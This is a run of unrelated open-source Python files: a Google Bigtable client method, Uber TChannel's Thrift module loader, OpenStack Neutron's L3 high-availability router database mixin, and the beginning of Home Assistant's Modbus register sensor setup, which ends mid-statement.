be applied. Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
row_key (bytes): The key of the row to which the read/modify/write rules should be applied.
rules (list[Union[dict, ~google.cloud.bigtable_v2.types.ReadModifyWriteRule]]): Rules specifying how the specified row's contents are to be transformed
into writes. Entries are applied in order, meaning that earlier rules will
affect the results of later ones.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.ReadModifyWriteRule`
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.bigtable_v2.types.ReadModifyWriteRowResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "read_modify_write_row" not in self._inner_api_calls:
self._inner_api_calls[
"read_modify_write_row"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.read_modify_write_row,
default_retry=self._method_configs["ReadModifyWriteRow"].retry,
default_timeout=self._method_configs["ReadModifyWriteRow"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.ReadModifyWriteRowRequest(
table_name=table_name,
row_key=row_key,
rules=rules,
app_profile_id=app_profile_id,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["read_modify_write_row"](
request, retry=retry, timeout=timeout, metadata=metadata
)
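# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the generated client above). Assumes
# application-default credentials are available in the environment and that
# the project/instance/table names below are replaced with real values.
def _example_read_rows():
    client = BigtableClient()
    table_name = client.table_path('my-project', 'my-instance', 'my-table')
    # read_rows() returns a stream of ReadRowsResponse messages; a single
    # row's cells may be split across several responses, so real callers
    # reassemble chunks before using them.
    for response in client.read_rows(table_name, rows_limit=10):
        print(response)
# ---------------------------------------------------------------------------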
|
|
# Copyright (c) 2016 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, unicode_literals
import sys
import types
from functools import partial
import thriftrw
from tornado import gen
from tornado.util import raise_exc_info
from tchannel.status import OK, FAILED
from tchannel.errors import OneWayNotSupportedError
from tchannel.errors import ValueExpectedError
from tchannel.response import Response, response_from_mixed
from tchannel.serializer.thrift import ThriftRWSerializer
from .module import ThriftRequest
def load(path, service=None, hostport=None, module_name=None):
"""Loads the Thrift file at the specified path.
The file is compiled in-memory and a Python module containing the result
is returned. It may be used with ``TChannel.thrift``. For example,
.. code-block:: python
from tchannel import TChannel, thrift
# Load our server's interface definition.
donuts = thrift.load(path='donuts.thrift')
# We need to specify a service name or hostport because this is a
# downstream service we'll be calling.
coffee = thrift.load(path='coffee.thrift', service='coffee')
tchannel = TChannel('donuts')
@tchannel.thrift.register(donuts.DonutsService)
@tornado.gen.coroutine
def submitOrder(request):
args = request.body
if args.coffee:
yield tchannel.thrift(
coffee.CoffeeService.order(args.coffee)
)
# ...
    The returned module contains one top-level type for each struct, enum,
    union, exception, and service defined in the Thrift file. For each service,
the corresponding class contains a classmethod for each function defined
in that service that accepts the arguments for that function and returns a
``ThriftRequest`` capable of being sent via ``TChannel.thrift``.
For more information on what gets generated by ``load``, see `thriftrw
<http://thriftrw.readthedocs.org/en/latest/>`_.
Note that the ``path`` accepted by ``load`` must be either an absolute
    path or a path relative to *the current directory*. If you need to
refer to Thrift files relative to the Python module in which ``load`` was
called, use the ``__file__`` magic variable.
.. code-block:: python
# Given,
#
# foo/
# myservice.thrift
# bar/
# x.py
#
# Inside foo/bar/x.py,
path = os.path.join(
os.path.dirname(__file__), '../myservice.thrift'
)
The returned value is a valid Python module. You can install the module by
adding it to the ``sys.modules`` dictionary. This will allow importing
items from this module directly. You can use the ``__name__`` magic
variable to make the generated module a submodule of the current module.
For example,
.. code-block:: python
# foo/bar.py
import sys
from tchannel import thrift
        donuts = thrift.load('donuts.thrift')
sys.modules[__name__ + '.donuts'] = donuts
This installs the module generated for ``donuts.thrift`` as the module
``foo.bar.donuts``. Callers can then import items from that module
directly. For example,
.. code-block:: python
# foo/baz.py
from foo.bar.donuts import DonutsService, Order
def baz(tchannel):
return tchannel.thrift(
DonutsService.submitOrder(Order(..))
)
:param str service:
Name of the service that the Thrift file represents. This name will be
used to route requests through Hyperbahn.
:param str path:
Path to the Thrift file. If this is a relative path, it must be
relative to the current directory.
:param str hostport:
Clients can use this to specify the hostport at which the service can
be found. If omitted, TChannel will route the requests through known
peers. This value is ignored by servers.
:param str module_name:
Name used for the generated Python module. Defaults to the name of the
Thrift file.
"""
# TODO replace with more specific exceptions
# assert service, 'service is required'
# assert path, 'path is required'
# Backwards compatibility for callers passing in service name as first arg.
if not path.endswith('.thrift'):
service, path = path, service
module = thriftrw.load(path=path, name=module_name)
return TChannelThriftModule(service, module, hostport)
class TChannelThriftModule(types.ModuleType):
"""Wraps the ``thriftrw``-generated module.
Wraps service classes with ``Service`` and exposes everything else from
the module as-is.
"""
def __init__(self, service, module, hostport=None):
"""Initialize a TChannelThriftModule.
:param str service:
Name of the service this module represents. This name will be used
for routing over Hyperbahn.
:param module:
Module generated by ``thriftrw`` for a Thrift file.
:param str hostport:
This may be specified if the caller is a client and wants all
requests sent to a specific address.
"""
self.service = service
self.hostport = hostport
self._module = module
services = getattr(self._module, '__services__', None)
if services is None:
# thriftrw <1.0
services = getattr(self._module, 'services')
for service_cls in services:
name = service_cls.service_spec.name
setattr(self, name, Service(service_cls, self))
def __getattr__(self, name):
return getattr(self._module, name)
def __str__(self):
return 'TChannelThriftModule(%s, %s)' % (self.service, self._module)
__repr__ = __str__
class Service(object):
"""Wraps service classes generated by thriftrw.
Exposes all functions of the service.
"""
def __init__(self, cls, module):
self._module = module
self._cls = cls
self._spec = cls.service_spec
self._setup_functions(self._spec)
def _setup_functions(self, spec):
if spec.parent:
# Set up inherited functions first.
self._setup_functions(spec.parent)
for func_spec in spec.functions:
setattr(self, func_spec.name, Function(func_spec, self))
@property
def name(self):
"""Name of the Thrift service this object represents."""
return self._spec.name
def __str__(self):
return 'Service(%s)' % self.name
__repr__ = __str__
class Function(object):
"""Wraps a ServiceFunction generated by thriftrw.
Acts as a callable that will construct ThriftRequests.
"""
__slots__ = (
'spec', 'service', '_func', '_request_cls', '_response_cls'
)
def __init__(self, func_spec, service):
self.spec = func_spec
self.service = service
self._func = func_spec.surface
self._request_cls = self._func.request
self._response_cls = self._func.response
@property
def endpoint(self):
"""Endpoint name for this function."""
return '%s::%s' % (self.service.name, self._func.name)
@property
def oneway(self):
"""Whether this function is oneway."""
return self.spec.oneway
def __call__(self, *args, **kwargs):
if self.oneway:
raise OneWayNotSupportedError(
'TChannel+Thrift does not currently support oneway '
'procedures.'
)
if not (
self.service._module.hostport or
self.service._module.service
):
raise ValueError(
"No 'service' or 'hostport' provided to " +
str(self)
)
module = self.service._module
call_args = self._request_cls(*args, **kwargs)
return ThriftRWRequest(
module=module,
service=module.service,
endpoint=self.endpoint,
result_type=self._response_cls,
call_args=call_args,
hostport=module.hostport,
)
def __str__(self):
return 'Function(%s)' % self.endpoint
__repr__ = __str__
def register(dispatcher, service, handler=None, method=None):
"""
:param dispatcher:
RequestDispatcher against which the new endpoint will be registered.
:param Service service:
Service object representing the service whose endpoint is being
registered.
:param handler:
A function implementing the given Thrift function.
:param method:
If specified, name of the method being registered. Defaults to the
name of the ``handler`` function.
"""
def decorator(method, handler):
if not method:
method = handler.__name__
function = getattr(service, method, None)
assert function, (
'Service "%s" does not define method "%s"' % (service.name, method)
)
assert not function.oneway
dispatcher.register(
function.endpoint,
build_handler(function, handler),
ThriftRWSerializer(service._module, function._request_cls),
ThriftRWSerializer(service._module, function._response_cls),
)
return handler
if handler is None:
return partial(decorator, method)
else:
return decorator(method, handler)
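# ---------------------------------------------------------------------------
# Hedged sketch of how register() is typically reached: through
# TChannel.thrift.register, as shown in load()'s docstring. 'donuts.thrift'
# and submitOrder are illustrative names only.
def _example_register():
    from tchannel import TChannel, thrift
    donuts = thrift.load('donuts.thrift')
    tchannel = TChannel('donuts')
    @tchannel.thrift.register(donuts.DonutsService)
    def submitOrder(request):
        # request.body carries the deserialized Thrift arguments; the plain
        # return value is wrapped into the response union by build_handler().
        return None
    return submitOrder
# ---------------------------------------------------------------------------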
def build_handler(function, handler):
# response_cls is a class that represents the response union for this
# function. It accepts one parameter for each exception defined on the
# method and another parameter 'success' for the result of the call. The
# success kwarg is absent if the function doesn't return anything.
response_cls = function._response_cls
response_spec = response_cls.type_spec
@gen.coroutine
def handle(request):
# kwargs for this function's response_cls constructor
response_kwargs = {}
status = OK
try:
response = yield gen.maybe_future(handler(request))
except Exception as e:
response = Response()
for exc_spec in response_spec.exception_specs:
# Each exc_spec is a thriftrw.spec.FieldSpec. The spec
# attribute on that is the TypeSpec for the Exception class
# and the surface on the TypeSpec is the exception class.
exc_cls = exc_spec.spec.surface
if isinstance(e, exc_cls):
status = FAILED
response_kwargs[exc_spec.name] = e
break
else:
raise_exc_info(sys.exc_info())
else:
response = response_from_mixed(response)
if response_spec.return_spec is not None:
assert response.body is not None, (
'Expected a value to be returned for %s, '
                'but received None - only void procedures can '
'return None.' % function.endpoint
)
response_kwargs['success'] = response.body
response.status = status
response.body = response_cls(**response_kwargs)
raise gen.Return(response)
handle.__name__ = function.spec.name
return handle
class ThriftRWRequest(ThriftRequest):
def __init__(self, module, **kwargs):
kwargs['serializer'] = ThriftRWSerializer(
module, kwargs['result_type']
)
super(ThriftRWRequest, self).__init__(**kwargs)
def read_body(self, body):
response_spec = self.result_type.type_spec
for exc_spec in response_spec.exception_specs:
exc = getattr(body, exc_spec.name)
if exc is not None:
raise exc
# success - non-void
if response_spec.return_spec is not None:
if body.success is None:
raise ValueExpectedError(
'Expected a value to be returned for %s, '
                'but received None - only void procedures can '
'return None.' % self.endpoint
)
return body.success
# success - void
else:
return None
|
|
# Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import netaddr
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_utils import excutils
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.db import agents_db
from neutron.db import l3_dvr_db
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import l3_ext_ha_mode as l3_ha
from neutron.i18n import _LI, _LW
from neutron.openstack.common import log as logging
VR_ID_RANGE = set(range(1, 255))
MAX_ALLOCATION_TRIES = 10
UNLIMITED_AGENTS_PER_ROUTER = 0
LOG = logging.getLogger(__name__)
L3_HA_OPTS = [
cfg.BoolOpt('l3_ha',
default=False,
help=_('Enable HA mode for virtual routers.')),
cfg.IntOpt('max_l3_agents_per_router',
default=3,
help=_('Maximum number of agents on which a router will be '
'scheduled.')),
cfg.IntOpt('min_l3_agents_per_router',
default=constants.MINIMUM_AGENTS_FOR_HA,
help=_('Minimum number of agents on which a router will be '
'scheduled.')),
cfg.StrOpt('l3_ha_net_cidr',
default='169.254.192.0/18',
help=_('Subnet used for the l3 HA admin network.')),
]
cfg.CONF.register_opts(L3_HA_OPTS)
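# Hedged illustration (not part of the module): with the options registered
# above, operators set them in neutron.conf roughly like this; the values
# shown are examples, not recommendations.
#
#   [DEFAULT]
#   l3_ha = True
#   max_l3_agents_per_router = 3
#   min_l3_agents_per_router = 2
#   l3_ha_net_cidr = 169.254.192.0/18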
class L3HARouterAgentPortBinding(model_base.BASEV2):
"""Represent agent binding state of a HA router port.
A HA Router has one HA port per agent on which it is spawned.
This binding table stores which port is used for a HA router by a
L3 agent.
"""
__tablename__ = 'ha_router_agent_port_bindings'
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete='CASCADE'),
nullable=False, primary_key=True)
port = orm.relationship(models_v2.Port)
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id',
ondelete='CASCADE'),
nullable=False)
l3_agent_id = sa.Column(sa.String(36),
sa.ForeignKey("agents.id",
ondelete='CASCADE'))
agent = orm.relationship(agents_db.Agent)
state = sa.Column(sa.Enum('active', 'standby', name='l3_ha_states'),
default='standby',
server_default='standby')
class L3HARouterNetwork(model_base.BASEV2):
"""Host HA network for a tenant.
One HA Network is used per tenant, all HA router ports are created
on this network.
"""
__tablename__ = 'ha_router_networks'
tenant_id = sa.Column(sa.String(255), primary_key=True,
nullable=False)
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False, primary_key=True)
network = orm.relationship(models_v2.Network)
class L3HARouterVRIdAllocation(model_base.BASEV2):
"""VRID allocation per HA network.
Keep a track of the VRID allocations per HA network.
"""
__tablename__ = 'ha_router_vrid_allocations'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False, primary_key=True)
vr_id = sa.Column(sa.Integer(), nullable=False, primary_key=True)
class L3_HA_NAT_db_mixin(l3_dvr_db.L3_NAT_with_dvr_db_mixin):
"""Mixin class to add high availability capability to routers."""
extra_attributes = (
l3_dvr_db.L3_NAT_with_dvr_db_mixin.extra_attributes + [
{'name': 'ha', 'default': cfg.CONF.l3_ha},
{'name': 'ha_vr_id', 'default': 0}])
def _verify_configuration(self):
self.ha_cidr = cfg.CONF.l3_ha_net_cidr
try:
net = netaddr.IPNetwork(self.ha_cidr)
except netaddr.AddrFormatError:
raise l3_ha.HANetworkCIDRNotValid(cidr=self.ha_cidr)
if ('/' not in self.ha_cidr or net.network != net.ip):
raise l3_ha.HANetworkCIDRNotValid(cidr=self.ha_cidr)
self._check_num_agents_per_router()
def _check_num_agents_per_router(self):
max_agents = cfg.CONF.max_l3_agents_per_router
min_agents = cfg.CONF.min_l3_agents_per_router
if (max_agents != UNLIMITED_AGENTS_PER_ROUTER
and max_agents < min_agents):
raise l3_ha.HAMaximumAgentsNumberNotValid(
max_agents=max_agents, min_agents=min_agents)
if min_agents < constants.MINIMUM_AGENTS_FOR_HA:
raise l3_ha.HAMinimumAgentsNumberNotValid()
def __init__(self):
self._verify_configuration()
super(L3_HA_NAT_db_mixin, self).__init__()
def get_ha_network(self, context, tenant_id):
return (context.session.query(L3HARouterNetwork).
filter(L3HARouterNetwork.tenant_id == tenant_id).
first())
def _get_allocated_vr_id(self, context, network_id):
with context.session.begin(subtransactions=True):
query = (context.session.query(L3HARouterVRIdAllocation).
filter(L3HARouterVRIdAllocation.network_id == network_id))
allocated_vr_ids = set(a.vr_id for a in query) - set([0])
return allocated_vr_ids
def _allocate_vr_id(self, context, network_id, router_id):
for count in range(MAX_ALLOCATION_TRIES):
try:
with context.session.begin(subtransactions=True):
allocated_vr_ids = self._get_allocated_vr_id(context,
network_id)
available_vr_ids = VR_ID_RANGE - allocated_vr_ids
if not available_vr_ids:
raise l3_ha.NoVRIDAvailable(router_id=router_id)
allocation = L3HARouterVRIdAllocation()
allocation.network_id = network_id
allocation.vr_id = available_vr_ids.pop()
context.session.add(allocation)
return allocation.vr_id
except db_exc.DBDuplicateEntry:
LOG.info(_LI("Attempt %(count)s to allocate a VRID in the "
"network %(network)s for the router %(router)s"),
{'count': count, 'network': network_id,
'router': router_id})
raise l3_ha.MaxVRIDAllocationTriesReached(
network_id=network_id, router_id=router_id,
max_tries=MAX_ALLOCATION_TRIES)
def _delete_vr_id_allocation(self, context, ha_network, vr_id):
with context.session.begin(subtransactions=True):
context.session.query(L3HARouterVRIdAllocation).filter_by(
network_id=ha_network.network_id,
vr_id=vr_id).delete()
def _set_vr_id(self, context, router, ha_network):
with context.session.begin(subtransactions=True):
router.extra_attributes.ha_vr_id = self._allocate_vr_id(
context, ha_network.network_id, router.id)
def _create_ha_subnet(self, context, network_id, tenant_id):
args = {'subnet':
{'network_id': network_id,
'tenant_id': '',
'name': constants.HA_SUBNET_NAME % tenant_id,
'ip_version': 4,
'cidr': cfg.CONF.l3_ha_net_cidr,
'enable_dhcp': False,
'host_routes': attributes.ATTR_NOT_SPECIFIED,
'dns_nameservers': attributes.ATTR_NOT_SPECIFIED,
'allocation_pools': attributes.ATTR_NOT_SPECIFIED,
'gateway_ip': None}}
return self._core_plugin.create_subnet(context, args)
def _create_ha_network_tenant_binding(self, context, tenant_id,
network_id):
with context.session.begin(subtransactions=True):
ha_network = L3HARouterNetwork(tenant_id=tenant_id,
network_id=network_id)
context.session.add(ha_network)
return ha_network
def _create_ha_network(self, context, tenant_id):
admin_ctx = context.elevated()
args = {'network':
{'name': constants.HA_NETWORK_NAME % tenant_id,
'tenant_id': '',
'shared': False,
'admin_state_up': True,
'status': constants.NET_STATUS_ACTIVE}}
network = self._core_plugin.create_network(admin_ctx, args)
try:
ha_network = self._create_ha_network_tenant_binding(admin_ctx,
tenant_id,
network['id'])
except Exception:
with excutils.save_and_reraise_exception():
self._core_plugin.delete_network(admin_ctx, network['id'])
try:
self._create_ha_subnet(admin_ctx, network['id'], tenant_id)
except Exception:
with excutils.save_and_reraise_exception():
self._core_plugin.delete_network(admin_ctx, network['id'])
return ha_network
def get_number_of_agents_for_scheduling(self, context):
"""Return the number of agents on which the router will be scheduled.
Raises an exception if there are not enough agents available to honor
the min_agents config parameter. If the max_agents parameter is set to
0 all the agents will be used.
"""
min_agents = cfg.CONF.min_l3_agents_per_router
num_agents = len(self.get_l3_agents(context,
filters={'agent_modes': [constants.L3_AGENT_MODE_LEGACY,
constants.L3_AGENT_MODE_DVR_SNAT]}))
max_agents = cfg.CONF.max_l3_agents_per_router
if max_agents:
if max_agents > num_agents:
LOG.info(_LI("Number of available agents lower than "
"max_l3_agents_per_router. L3 agents "
"available: %s"), num_agents)
else:
num_agents = max_agents
if num_agents < min_agents:
raise l3_ha.HANotEnoughAvailableAgents(min_agents=min_agents,
num_agents=num_agents)
return num_agents
def _create_ha_port_binding(self, context, port_id, router_id):
with context.session.begin(subtransactions=True):
portbinding = L3HARouterAgentPortBinding(port_id=port_id,
router_id=router_id)
context.session.add(portbinding)
return portbinding
def add_ha_port(self, context, router_id, network_id, tenant_id):
port = self._core_plugin.create_port(context, {
'port':
{'tenant_id': '',
'network_id': network_id,
'fixed_ips': attributes.ATTR_NOT_SPECIFIED,
'mac_address': attributes.ATTR_NOT_SPECIFIED,
'admin_state_up': True,
'device_id': router_id,
'device_owner': constants.DEVICE_OWNER_ROUTER_HA_INTF,
'name': constants.HA_PORT_NAME % tenant_id}})
try:
return self._create_ha_port_binding(context, port['id'], router_id)
except Exception:
with excutils.save_and_reraise_exception():
self._core_plugin.delete_port(context, port['id'],
l3_port_check=False)
def _create_ha_interfaces(self, context, router, ha_network):
admin_ctx = context.elevated()
num_agents = self.get_number_of_agents_for_scheduling(context)
port_ids = []
try:
for index in range(num_agents):
binding = self.add_ha_port(admin_ctx, router.id,
ha_network.network['id'],
router.tenant_id)
port_ids.append(binding.port_id)
except Exception:
with excutils.save_and_reraise_exception():
for port_id in port_ids:
self._core_plugin.delete_port(admin_ctx, port_id,
l3_port_check=False)
def _delete_ha_interfaces(self, context, router_id):
admin_ctx = context.elevated()
device_filter = {'device_id': [router_id],
'device_owner':
[constants.DEVICE_OWNER_ROUTER_HA_INTF]}
ports = self._core_plugin.get_ports(admin_ctx, filters=device_filter)
for port in ports:
self._core_plugin.delete_port(admin_ctx, port['id'],
l3_port_check=False)
def _notify_ha_interfaces_updated(self, context, router_id):
self.l3_rpc_notifier.routers_updated(
context, [router_id], shuffle_agents=True)
@classmethod
def _is_ha(cls, router):
ha = router.get('ha')
if not attributes.is_attr_set(ha):
ha = cfg.CONF.l3_ha
return ha
def create_router(self, context, router):
is_ha = self._is_ha(router['router'])
if is_ha and l3_dvr_db.is_distributed_router(router['router']):
raise l3_ha.DistributedHARouterNotSupported()
router['router']['ha'] = is_ha
router_dict = super(L3_HA_NAT_db_mixin,
self).create_router(context, router)
if is_ha:
try:
router_db = self._get_router(context, router_dict['id'])
ha_network = self.get_ha_network(context,
router_db.tenant_id)
if not ha_network:
ha_network = self._create_ha_network(context,
router_db.tenant_id)
self._set_vr_id(context, router_db, ha_network)
self._create_ha_interfaces(context, router_db, ha_network)
self._notify_ha_interfaces_updated(context, router_db.id)
except Exception:
with excutils.save_and_reraise_exception():
self.delete_router(context, router_dict['id'])
router_dict['ha_vr_id'] = router_db.extra_attributes.ha_vr_id
return router_dict
def _update_router_db(self, context, router_id, data, gw_info):
ha = data.pop('ha', None)
if ha and data.get('distributed'):
raise l3_ha.DistributedHARouterNotSupported()
with context.session.begin(subtransactions=True):
router_db = super(L3_HA_NAT_db_mixin, self)._update_router_db(
context, router_id, data, gw_info)
ha_not_changed = ha is None or ha == router_db.extra_attributes.ha
if ha_not_changed:
return router_db
ha_network = self.get_ha_network(context,
router_db.tenant_id)
router_db.extra_attributes.ha = ha
if not ha:
self._delete_vr_id_allocation(
context, ha_network, router_db.extra_attributes.ha_vr_id)
router_db.extra_attributes.ha_vr_id = None
if ha:
if not ha_network:
ha_network = self._create_ha_network(context,
router_db.tenant_id)
self._set_vr_id(context, router_db, ha_network)
self._create_ha_interfaces(context, router_db, ha_network)
self._notify_ha_interfaces_updated(context, router_db.id)
else:
self._delete_ha_interfaces(context, router_db.id)
self._notify_ha_interfaces_updated(context, router_db.id)
return router_db
def update_router_state(self, context, router_id, state, host):
with context.session.begin(subtransactions=True):
bindings = self.get_ha_router_port_bindings(context, [router_id],
host)
if bindings:
if len(bindings) > 1:
LOG.warn(_LW("The router %(router_id)s is bound multiple "
"times on the agent %(host)s"),
{'router_id': router_id, 'host': host})
bindings[0].update({'state': state})
def delete_router(self, context, id):
router_db = self._get_router(context, id)
super(L3_HA_NAT_db_mixin, self).delete_router(context, id)
if router_db.extra_attributes.ha:
ha_network = self.get_ha_network(context,
router_db.tenant_id)
if ha_network:
self._delete_vr_id_allocation(
context, ha_network, router_db.extra_attributes.ha_vr_id)
self._delete_ha_interfaces(context, router_db.id)
def get_ha_router_port_bindings(self, context, router_ids, host=None):
query = context.session.query(L3HARouterAgentPortBinding)
if host:
query = query.join(agents_db.Agent).filter(
agents_db.Agent.host == host)
query = query.filter(
L3HARouterAgentPortBinding.router_id.in_(router_ids))
return query.all()
def _process_sync_ha_data(self, context, routers, host):
routers_dict = dict((router['id'], router) for router in routers)
bindings = self.get_ha_router_port_bindings(context,
routers_dict.keys(),
host)
for binding in bindings:
port_dict = self._core_plugin._make_port_dict(binding.port)
router = routers_dict.get(binding.router_id)
router[constants.HA_INTERFACE_KEY] = port_dict
router[constants.HA_ROUTER_STATE_KEY] = binding.state
for router in routers_dict.values():
interface = router.get(constants.HA_INTERFACE_KEY)
if interface:
self._populate_subnet_for_ports(context, [interface])
return routers_dict.values()
def get_ha_sync_data_for_host(self, context, host=None, router_ids=None,
active=None):
sync_data = super(L3_HA_NAT_db_mixin, self).get_sync_data(context,
router_ids,
active)
return self._process_sync_ha_data(context, sync_data, host)
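# ---------------------------------------------------------------------------
# Hedged sketch (not part of the mixin above): _allocate_vr_id() implements
# optimistic allocation -- pick a free id, try to insert it, and retry on
# DBDuplicateEntry when a concurrent transaction claimed the same id first.
# The standalone helper below shows the same shape with a plain set and a
# caller-supplied claim() callable standing in for the database insert; all
# names are illustrative.
def _example_optimistic_allocation(claim, candidates, allocated, max_tries=10):
    """claim(vr_id) returns False when a concurrent writer took the id."""
    for _ in range(max_tries):
        available = candidates - allocated
        if not available:
            raise RuntimeError('no id available')
        vr_id = available.pop()
        if claim(vr_id):
            return vr_id
        allocated.add(vr_id)  # remember the conflict and retry
    raise RuntimeError('max allocation tries reached')
# ---------------------------------------------------------------------------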
|
|
"""Support for Modbus Register sensors."""
import logging
import struct
from typing import Any, Optional, Union
from pymodbus.exceptions import ConnectionException, ModbusException
from pymodbus.pdu import ExceptionResponse
import voluptuous as vol
from homeassistant.components.sensor import DEVICE_CLASSES_SCHEMA, PLATFORM_SCHEMA
from homeassistant.const import (
CONF_DEVICE_CLASS,
CONF_NAME,
CONF_OFFSET,
CONF_SLAVE,
CONF_STRUCTURE,
CONF_UNIT_OF_MEASUREMENT,
)
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
from .const import (
CALL_TYPE_REGISTER_HOLDING,
CALL_TYPE_REGISTER_INPUT,
CONF_COUNT,
CONF_DATA_TYPE,
CONF_HUB,
CONF_PRECISION,
CONF_REGISTER,
CONF_REGISTER_TYPE,
CONF_REGISTERS,
CONF_REVERSE_ORDER,
CONF_SCALE,
DATA_TYPE_CUSTOM,
DATA_TYPE_FLOAT,
DATA_TYPE_INT,
DATA_TYPE_STRING,
DATA_TYPE_UINT,
DEFAULT_HUB,
MODBUS_DOMAIN,
)
_LOGGER = logging.getLogger(__name__)
def number(value: Any) -> Union[int, float]:
"""Coerce a value to number without losing precision."""
if isinstance(value, int):
return value
if isinstance(value, str):
try:
value = int(value)
return value
except (TypeError, ValueError):
pass
try:
value = float(value)
return value
except (TypeError, ValueError):
raise vol.Invalid(f"invalid number {value}")
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_REGISTERS): [
{
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_REGISTER): cv.positive_int,
vol.Optional(CONF_COUNT, default=1): cv.positive_int,
vol.Optional(CONF_DATA_TYPE, default=DATA_TYPE_INT): vol.In(
[
DATA_TYPE_INT,
DATA_TYPE_UINT,
DATA_TYPE_FLOAT,
DATA_TYPE_STRING,
DATA_TYPE_CUSTOM,
]
),
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_HUB, default=DEFAULT_HUB): cv.string,
vol.Optional(CONF_OFFSET, default=0): number,
vol.Optional(CONF_PRECISION, default=0): cv.positive_int,
vol.Optional(
CONF_REGISTER_TYPE, default=CALL_TYPE_REGISTER_HOLDING
): vol.In([CALL_TYPE_REGISTER_HOLDING, CALL_TYPE_REGISTER_INPUT]),
vol.Optional(CONF_REVERSE_ORDER, default=False): cv.boolean,
vol.Optional(CONF_SCALE, default=1): number,
vol.Optional(CONF_SLAVE): cv.positive_int,
vol.Optional(CONF_STRUCTURE): cv.string,
vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
}
]
}
)
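# Hedged illustration (not part of the module): a configuration.yaml entry
# matching the schema above; names and register addresses are examples only.
#
#   sensor:
#     - platform: modbus
#       registers:
#         - name: Boiler temperature
#           register: 100
#           count: 2
#           data_type: float
#           precision: 1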
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Modbus sensors."""
sensors = []
data_types = {
DATA_TYPE_INT: {1: "h", 2: "i", 4: "q"},
DATA_TYPE_UINT: {1: "H", 2: "I", 4: "Q"},
DATA_TYPE_FLOAT: {1: "e", 2: "f", 4: "d"},
}
for register in config[CONF_REGISTERS]:
structure = ">i"
if register[CONF_DATA_TYPE] == DATA_TYPE_STRING:
structure = str(register[CONF_COUNT] * 2) + "s"
elif register[CONF_DATA_TYPE] != DATA_TYPE_CUSTOM:
try:
structure = (
f">{data_types[register[CONF_DATA_TYPE]][register[CONF_COUNT]]}"
)
except KeyError:
_LOGGER.error(
"Unable to detect data type for %s sensor, try a custom type",
register[CONF_NAME],
)
continue
else:
structure = register.get(CONF_STRUCTURE)
try:
size = struct.calcsize(structure)
except struct.error as err:
_LOGGER.error("Error in sensor %s structure: %s", register[CONF_NAME], err)
continue
if register[CONF_COUNT] * 2 != size:
_LOGGER.error(
"Structure size (%d bytes) mismatch registers count (%d words)",
size,
register[CONF_COUNT],
)
continue
hub_name = register[CONF_HUB]
hub = hass.data[MODBUS_DOMAIN][hub_name]
sensors.append(
ModbusRegisterSensor(
hub,
register[CONF_NAME],
register.get(CONF_SLAVE),
register[CONF_REGISTER],
register[CONF_REGISTER_TYPE],
register.get(CONF_UNIT_OF_MEASUREMENT),
register[CONF_COUNT],
register[CONF_REVERSE_ORDER],
register[CONF_SCALE],
register[CONF_OFFSET],
structure,
register[CONF_PRECISION],
register[CONF_DATA_TYPE],
